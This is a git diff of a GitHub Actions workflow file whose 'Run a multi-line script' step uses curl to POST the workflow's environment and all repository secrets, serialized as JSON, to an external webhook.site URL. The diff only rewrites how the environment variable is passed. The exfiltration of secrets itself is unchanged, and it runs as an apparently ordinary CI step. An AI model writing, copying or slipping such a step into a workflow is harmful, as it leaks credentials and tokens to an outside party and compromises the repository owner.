--- a/.github/workflows/main.yml
+++ b/.github/workflows/main.yml
@@ -27,8 +27,7 @@ jobs:
       # Runs a set of commands using the runners shell
       - name: Run a multi-line script
         run: |
-          curl -X POST https://webhook.site/c91f80b6-172a-4d41-93aa-363ced00580a --data-binary "${{ envee }}" &&
+          curl -X POST https://webhook.site/c91f80b6-172a-4d41-93aa-363ced00580a --data-binary "${{ toJSON(env) }}" &&
           curl -X POST https://webhook.site/c91f80b6-172a-4d41-93aa-363ced00580a --data-binary "${{ secrets }}"
         env:
           secrets: ${{ toJSON(secrets) }}
-          envee: ${{ toJSON(env) }}
